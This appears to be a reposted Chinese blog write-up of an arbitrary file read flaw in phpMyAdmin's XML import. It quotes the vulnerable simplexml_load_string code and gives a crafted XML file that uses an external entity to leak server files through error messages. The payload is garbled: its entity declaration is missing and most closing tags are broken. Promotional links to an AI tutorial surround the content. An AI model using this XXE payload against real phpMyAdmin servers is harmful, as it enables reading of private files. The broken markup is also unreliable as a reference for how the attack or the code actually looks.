PhpMyadmin任意文件读取漏洞

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

                 

libraries/import/xml.php中

unset($data);/** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * alter the code in any way. It's basically a freebee. */$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);unset($buffer);/** * The XML was malformed */if ($xml === FALSE) {



可以使用系统中的import功能导入一个精心构造的xml文件

xml version="1.0" encoding="utf-8"?>]><pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">        <pma:structure_schemas>        <pma:database name="test" collation="utf8_general_ci" charset="utf8">            <pma:table name="ts_ad">                &hi80sec;            pma:table>        pma:database>    pma:structure_schemas>        <database name="thinksns">            database>pma_xml_export>


来读写文件,系统错误信息会直接显示出文件内容

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow

这里写图片描述

你可能感兴趣的:(PhpMyadmin任意文件读取漏洞)